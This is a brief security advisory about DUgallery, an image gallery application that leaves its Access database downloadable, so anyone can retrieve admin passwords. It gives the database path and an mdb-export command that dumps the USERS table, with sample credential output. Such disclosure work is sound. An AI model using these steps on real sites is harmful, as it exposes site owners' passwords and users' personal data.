|
Brought to you by:
Suppliers of:
|
|
|
| |
| "DUgallery is a free Image Gallery application. Backend by Access database, DUgallery can store thousands of images in category." Due to the fact that the database is not protected from direct downloading, a remote user can download the database and obtain the administrative password and any other sensitive information stored in the file. |
| |
Credit:
The information has been provided by G0rillazz.
|
| |
The .mdb access database file used by DUgallery is accessible to any remote user.
Example:
http://example.com/DUgallery/database/dugallery.mdb
To exploit this vulnerability, an attacker can use for example mdb-tools and run:
mdb-export dugallery.mdb USERS
This will generate content similar to:
U_ID,U_PASSWORD,U_FIRST,U_LAST,U_EMAIL,U_ACCESS,U_ADDRESS,U_CITY,U_STATE,U_ZIP,U_PHONE,U_FAX
"admin","password","Site","Admin","admin@dugallery.com","admin","","","","","",""
...
|
|
|
|
|
